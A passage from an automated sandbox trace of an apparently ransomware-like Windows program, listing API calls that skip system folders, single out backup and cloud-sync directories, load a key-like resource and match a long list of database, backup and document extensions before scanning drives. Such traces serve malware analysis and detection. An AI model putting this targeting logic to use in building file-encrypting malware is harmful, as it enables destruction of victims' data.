cchCount2=9) returned 3 [0058.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="[FEX_END]", cchCount2=9) returned 3 [0058.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="[FEX_END]", cchCount2=9) returned 3 [0058.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="[FEX_END]", cchCount2=9) returned 3 [0058.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="[FEX_END]", cchCount2=9) returned 3 [0058.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[FEX_END]", cchCount2=9) returned 3 [0058.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[FEX_END]", cchCount2=9) returned 3 [0058.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="[FEX_END]", cchCount2=9) returned 3 [0058.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="[FEX_END]", cchCount2=9) returned 3 [0058.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[FEX_END]", cchCount2=9) returned 3 [0058.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[FEX_END]", cchCount2=9) returned 3 [0058.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PERFLOGS\\", cchCount1=10, lpString2="[FEX_END]", cchCount2=9) returned 3 [0058.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS\\", cchCount1=9, lpString2="[FEX_END]", cchCount2=9) returned 3 [0058.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS.OLD\\", cchCount1=13, lpString2="[FEX_END]", cchCount2=9) returned 3 [0058.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS10UPGRADE\\", cchCount1=18, lpString2="[FEX_END]", cchCount2=9) returned 3 [0058.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\$RECYCLE.BIN\\", cchCount1=14, lpString2="[FEX_END]", cchCount2=9) returned 3 [0058.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS NT\\", cchCount1=12, lpString2="[FEX_END]", cchCount2=9) returned 3 [0058.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\COMMON FILES\\", cchCount1=14, lpString2="[FEX_END]", cchCount2=9) returned 3 [0058.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMP\\", cchCount1=6, lpString2="[FEX_END]", cchCount2=9) returned 3 [0058.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BOOT\\", cchCount1=6, lpString2="[FEX_END]", cchCount2=9) returned 3 [0058.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MSOCACHE\\", cchCount1=10, lpString2="[FEX_END]", cchCount2=9) returned 3 [0058.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DEFAULT USER\\", cchCount1=14, lpString2="[FEX_END]", cchCount2=9) returned 3 [0058.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FILES\\ACRONIS\\", cchCount1=14, lpString2="[FEX_END]", cchCount2=9) returned 3 [0058.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="(X86)\\ACRONIS\\", cchCount1=14, lpString2="[FEX_END]", cchCount2=9) returned 1 [0058.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FILES\\BACKUPCLIENT\\", cchCount1=19, lpString2="[FEX_END]", cchCount2=9) returned 3 [0058.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="(X86)\\BACKUPCLIENT\\", cchCount1=19, lpString2="[FEX_END]", cchCount2=9) returned 1 [0058.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FILES\\BACKUP MANAGER\\", cchCount1=21, lpString2="[FEX_END]", cchCount2=9) returned 3 [0058.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="(X86)\\BACKUP MANAGER\\", cchCount1=21, lpString2="[FEX_END]", cchCount2=9) returned 1 [0058.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FILES\\CARBONITE\\", cchCount1=16, lpString2="[FEX_END]", cchCount2=9) returned 3 [0058.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="(X86)\\CARBONITE\\", cchCount1=16, lpString2="[FEX_END]", cchCount2=9) returned 1 [0058.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FILES\\GOOGLE\\DRIVE\\", cchCount1=19, lpString2="[FEX_END]", cchCount2=9) returned 3 [0058.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="(X86)\\GOOGLE\\DRIVE\\", cchCount1=19, lpString2="[FEX_END]", cchCount2=9) returned 1 [0058.110] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FILES\\DROPBOX\\", cchCount1=14, lpString2="[FEX_END]", cchCount2=9) returned 3 [0058.110] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="(X86)\\DROPBOX\\", cchCount1=14, lpString2="[FEX_END]", cchCount2=9) returned 1 [0058.110] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FILES\\MICROSOFT ONEDRIVE\\", cchCount1=25, lpString2="[FEX_END]", cchCount2=9) returned 3 [0058.110] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="(X86)\\MICROSOFT ONEDRIVE\\", cchCount1=25, lpString2="[FEX_END]", cchCount2=9) returned 1 [0058.110] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FILES\\ONEDRIVE\\", cchCount1=15, lpString2="[FEX_END]", cchCount2=9) returned 3 [0058.110] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="(X86)\\ONEDRIVE\\", cchCount1=15, lpString2="[FEX_END]", cchCount2=9) returned 1 [0058.110] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VNC\\", cchCount1=4, lpString2="[FEX_END]", cchCount2=9) returned 3 [0058.110] FindResourceW (hModule=0x400000, lpName="PRL", lpType=0xa) returned 0x4f54b0 [0058.110] LoadResource (hModule=0x400000, hResInfo=0x4f54b0) returned 0x526fac [0058.110] SizeofResource (hModule=0x400000, hResInfo=0x4f54b0) returned 0x1d2 [0058.110] LockResource (hResData=0x526fac) returned 0x526fac [0058.111] FreeResource (hResData=0x526fac) returned 0 [0058.111] FindResourceW (hModule=0x400000, lpName="KN", lpType=0xa) returned 0x4f5450 [0058.111] LoadResource (hModule=0x400000, hResInfo=0x4f5450) returned 0x526358 [0058.111] SizeofResource (hModule=0x400000, hResInfo=0x4f5450) returned 0x26 [0058.111] LockResource (hResData=0x526358) returned 0x526358 [0058.111] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fa5388, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0058.111] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fa5388, cbMultiByte=38, lpWideCharStr=0x1f9e50c, cchWideChar=38 | out: lpWideCharStr="dkL9wVUbD1bbWmxWGU9esuGcvXtTDFxr\r\n42\r\n") returned 38 [0058.111] FreeResource (hResData=0x526358) returned 0 [0058.111] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dkL9wVUbD1bbWmxWGU9esuGcvXtTDFxr", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0058.111] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dkL9wVUbD1bbWmxWGU9esuGcvXtTDFxr", cchWideChar=32, lpMultiByteStr=0x1fa538c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dkL9wVUbD1bbWmxWGU9esuGcvXtTDFxr", lpUsedDefaultChar=0x0) returned 32 [0058.111] GetCurrentThreadId () returned 0xa68 [0058.111] GetCurrentThreadId () returned 0xa68 [0058.111] GetCurrentThreadId () returned 0xa68 [0058.111] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1f14868, cbMultiByte=466, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 466 [0058.111] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1f14868, cbMultiByte=466, lpWideCharStr=0x1f4a97c, cchWideChar=466 | out: lpWideCharStr="MDF\r\nNDF\r\nLDF\r\nMYD\r\nEQL\r\nSQL\r\nDB\r\nDBK\r\nDB2\r\nDB3\r\nDBC\r\nDT\r\nDBS\r\nDBF\r\nDBX\r\nMDB\r\nSDF\r\nNS2\r\nNS3\r\nNS4\r\nNSF\r\nACCDB\r\nVPD\r\nVHD\r\nVHDX\r\nAVHDX\r\nVDI\r\nSQLITE\r\nSQLITE3\r\nSQLITEDB\r\nSQB\r\nTRN\r\nIMG\r\nBAK\r\nBAC\r\nBCK\r\nBCKP\r\nBACKUP\r\nBACKUPDB\r\nFH\r\nTIB\r\nTIS\r\n001\r\nWBB\r\nV2I\r\nIV2I\r\nINPROGRESS\r\nZIP\r\nRAR\r\nZ\r\n7Z\r\nGZ\r\nTAR\r\nDMP\r\nWMT\r\nVMDK\r\nGHO\r\nGHS\r\nOEB\r\nPST\r\nXLSX\r\nXLS\r\nDOCX\r\nDOC\r\nDOT\r\nDOTX\r\nODT\r\nODS\r\nHWP\r\nHWT\r\nHML\r\nHWDT\r\nHWPX\r\nCELL\r\nNXL\r\nHCDT\r\nNXT\r\nSHOW\r\nHPT\r\nHSDT\r\nDWG\r\nCDR\r\nPDF\r\nJPG\r\nJPEG\r\nPSD") returned 466 [0058.112] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dlnxsw.exe\" " [0058.112] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dlnxsw.exe\" " [0058.112] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dlnxsw.exe\" " [0058.112] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dlnxsw.exe\" " [0058.112] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dlnxsw.exe\" " [0058.112] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f720, nSize=0x105 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dlnxsw.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dlnxsw.exe")) returned 0x30 [0058.112] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ALL*.fldp", lpFindFileData=0x18f96c | out: lpFindFileData=0x18f96c*(dwFileAttributes=0x77cd1f76, ftCreationTime.dwLowDateTime=0x400000, ftCreationTime.dwHighDateTime=0x4, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x1fac1e4, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x18f9a4, nFileSizeLow=0x77ca2dfa, dwReserved0=0x1fac216, dwReserved1=0x1f14a00, cFileName="\x12", cAlternateFileName="")) returned 0xffffffff [0058.112] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0058.112] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dlnxsw.exe\" " [0058.113] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="[LDRIVESSCAN]", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0058.113] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="[LDRIVESSCAN]", cchWideChar=13, lpMultiByteStr=0x1f730cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[LDRIVESSCAN]", lpUsedDefaultChar=0x0) returned 13 [0058.113] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0xd, lpNumberOfBytesWritten=0x18fbc0, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x18fbc0*=0xd, lpOverlapped=0x0) returned 1 [0058.114] FindFirstFileW (in: lpFileName="C:\\*.*", lpFindFileData=0x18f8f4 | out: lpFindFileData=0x18f8f4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x694688 [0058.114] CharUpperBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", cchLength=0x26 | out: lpsz="C:\\USERS\\5P5NRGJN0JS HALPMCXZ\\DESKTOP\\") returned 0x26 [0058.114] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0058.114] CharUpperBuffW (in: lpsz="\\PERFLOGS\\", cchLength=0xa | out: lpsz="\\PERFLOGS\\") returned 0xa [0058.114] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0058.114] CharUpperBuffW (in: lpsz="\\WINDOWS\\", cchLength=0x9 | out: lpsz="\\WINDOWS\\") returned 0x9 [0058.114] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0058.114] CharUpperBuffW (in: lpsz="\\WINDOWS.OLD\\", cchLength=0xd | out: lpsz="\\WINDOWS.OLD\\") returned 0xd [0058.114] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0058.114] CharUpperBuffW (in: lpsz="\\WINDOWS10UPGRADE\\", cchLength=0x12 | out: lpsz="\\WINDOWS10UPGRADE\\") returned 0x12 [0058.115] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0058.115] CharUpperBuffW (in: lpsz="\\$RECYCLE.BIN\\", cchLength=0xe | out: lpsz="\\$RECYCLE.BIN\\") returned 0xe [0058.115] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0058.115] CharUpperBuffW (in: lpsz=".Bin", cchLength=0x4 | out: lpsz=".BIN") returned 0x4 [0058.115] CharUpperBuffW (in: lpsz="$Recycle.Bin", cchLength=0xc | out: lpsz="$RECYCLE.BIN") returned 0xc [0058.115] FindNextFileW (in: hFindFile=0x694688, lpFindFileData=0x18f8f4 | out: lpFindFileData=0x18f8f4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0058.115] CharUpperBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", cchLength=0x26 | out: lpsz="C:\\USERS\\5P5NRGJN0JS HALPMCXZ\\DESKTOP\\") returned 0x26 [0058.115] CharUpperBuffW (in: lpsz="C:\\Boot\\", cchLength=0x8 | out: lpsz="C:\\BOOT\\") returned 0x8 [0058.115] CharUpperBuffW (in: lpsz="\\PERFLOGS\\", cchLength=0xa | out: lpsz="\\PERFLOGS\\") returned 0xa [0058.115] CharUpperBuffW (in: lpsz="C:\\Boot\\", cchLength=0x8 | out: lpsz="C:\\BOOT\\") returned 0x8 [0058.115] CharUpperBuffW (in: lpsz="\\WINDOWS\\", cchLength=0x9 | out: lpsz="\\WINDOWS\\") returned 0x9 [0058.115] CharUpperBuffW (in: lpsz="C:\\Boot\\", cchLength=0x8 | out: lpsz="C:\\BOOT\\") returned 0x8 [0058.115] CharUpperBuffW (in: lpsz="\\WINDOWS.OLD\\", cchLength=0xd | out: lpsz="\\WINDOWS.OLD\\") returned 0xd [0058.115] CharUpperBuffW (in: lpsz="C:\\Boot\\", cchLength=0x8 | out: lpsz="C:\\BOOT\\") returned 0x8 [0058.115] CharUpperBuffW (in: lpsz="\\WINDOWS10UPGRADE\\", cchLength=0x12 | out: lpsz="\\WINDOWS10UPGRADE\\") returned 0x12 [0058.116] CharUpperBuffW (in: lpsz="C:\\Boot\\", cchLength=0x8 | out: lpsz="C:\\BOOT\\") returned 0x8 [0058.116] CharUpperBuffW (in: lpsz="\\$RECYCLE.BIN\\", cchLength=0xe | out: lpsz="\\$RECYCLE.BIN\\") returned 0xe [0058.116] CharUpperBuffW (in: lpsz="C:\\Boot\\", cchLength=0x8 | out: lpsz="C:\\BOOT\\") returned 0x8 [0058.116] CharUpperBuffW (in: lpsz="\\WINDOWS NT\\", cchLength=0xc | out: lpsz="\\WINDOWS NT\\") returned 0xc [0058.116] CharUpperBuffW (in: lpsz="C:\\Boot\\", cchLength=0x8 | out: lpsz="C:\\BOOT\\") returned 0x8 [0058.116] CharUpperBuffW (in: lpsz="\\COMMON FILES\\", cchLength=0xe | out: lpsz="\\COMMON FILES\\") returned 0xe [0058.116] CharUpperBuffW (in: lpsz="C:\\Boot\\", cchLength=0x8 | out: lpsz="C:\\BOOT\\") returned 0x8 [0058.116] CharUpperBuffW (in: lpsz="\\TEMP\\", cchLength=0x6 | out: lpsz="\\TEMP\\") returned 0x6 [0058.116] CharUpperBuffW (in: lpsz="C:\\Boot\\", cchLength=0x8 | out: lpsz="C:\\BOOT\\") returned 0x8 [0058.116] CharUpperBuffW (in: lpsz="\\BOOT\\", cchLength=0x6 | out: lpsz="\\BOOT\\") returned 0x6 [0058.116] CharUpperBuffW (in: lpsz="C:\\Boot\\", cchLength=0x8 | out: lpsz="C:\\BOOT\\") returned 0x8 [0058.116] CharUpperBuffW (in: lpsz="Boot", cchLength=0x4 | out: lpsz="BOOT") returned 0x4 [0058.116] FindNextFileW (in: hFindFile=0x694688, lpFindFileData=0x18f8f4 | out: lpFindFileData=0x18f8f4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0058.116] CharUpperBuffW (in: lpsz="bootmgr", cchLength=0x7 | out: lpsz="BOOTMGR") returned 0x7 [0058.116] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="", cchCount2=0) returned 3 [0058.116] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="", cchCount2=0) returned 3 [0058.116] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="", cchCount2=0) returned 3 [0058.116] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="", cchCount2=0) returned 3 [0058.116] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="", cchCount2=0) returned 3 [0058.116] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="", cchCount2=0) returned 3 [0058.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="", cchCount2=0) returned 3 [0058.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="", cchCount2=0) returned 3 [0058.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="", cchCount2=0) returned 3 [0058.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="", cchCount2=0) returned 3 [0058.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="", cchCount2=0) returned 3 [0058.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="", cchCount2=0) returned 3 [0058.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="", cchCount2=0) returned 3 [0058.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0058.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="", cchCount2=0) returned 3 [0058.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="", cchCount2=0) returned 3 [0058.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="", cchCount2=0) returned 3 [0058.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="", cchCount2=0) returned 3 [0058.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="BOOTMGR", cchCount2=7) returned 3 [0058.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="BOOTMGR", cchCount2=7) returned 3 [0058.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="BOOTMGR", cchCount2=7) returned 3 [0058.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="BOOTMGR", cchCount2=7) returned 3 [0058.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="BOOTMGR", cchCount2=7) returned 3 [0058.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="BOOTMGR", cchCount2=7) returned 3 [0058.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="BOOTMGR", cchCount2=7) returned 3 [0058.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="BOOTMGR", cchCount2=7) returned 3 [0058.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="BOOTMGR", cchCount2=7) returned 2 [0058.118] FindNextFileW (in: hFindFile=0x694688, lpFindFileData=0x18f8f4 | out: lpFindFileData=0x18f8f4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0058.118] CharUpperBuffW (in: lpsz=".BAK", cchLength=0x4 | out: lpsz=".BAK") returned 0x4 [0058.118] CharUpperBuffW (in: lpsz="BOOTSECT.BAK", cchLength=0xc | out: lpsz="BOOTSECT.BAK") returned 0xc [0058.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="BAK", cchCount2=3) returned 3 [0058.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="BAK", cchCount2=3) returned 3 [0058.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="BAK", cchCount2=3) returned 3 [0058.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="BAK", cchCount2=3) returned 3 [0058.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="BAK", cchCount2=3) returned 3 [0058.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="BAK", cchCount2=3) returned 3 [0058.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="BAK", cchCount2=3) returned 3 [0058.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="BAK", cchCount2=3) returned 3 [0058.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="BAK", cchCount2=3) returned 3 [0058.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="BAK", cchCount2=3) returned 3 [0058.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="BAK", cchCount2=3) returned 3 [0058.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="BAK", cchCount2=3) returned 3 [0058.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="BAK", cchCount2=3) returned 3 [0058.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="BAK", cchCount2=3) returned 3 [0058.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="BAK", cchCount2=3) returned 3 [0058.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="BAK", cchCount2=3) returned 3 [0058.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="BAK", cchCount2=3) returned 3 [0058.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="BAK", cchCount2=3) returned 3 [0058.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="BOOTSECT.BAK", cchCount2=12) returned 3 [0058.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="BOOTSECT.BAK", cchCount2=12) returned 3 [0058.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="BOOTSECT.BAK", cchCount2=12) returned 3 [0058.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="BOOTSECT.BAK", cchCount2=12) returned 3 [0058.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="BOOTSECT.BAK", cchCount2=12) returned 3 [0058.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="BOOTSECT.BAK", cchCount2=12) returned 3 [0058.119] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="BOOTSECT.BAK", cchCount2=12) returned 3 [0058.119] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="BOOTSECT.BAK", cchCount2=12) returned 2 [0058.119] FindNextFileW (in: hFindFile=0x694688, lpFindFileData=0x18f8f4 | out: lpFindFileData=0x18f8f4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, 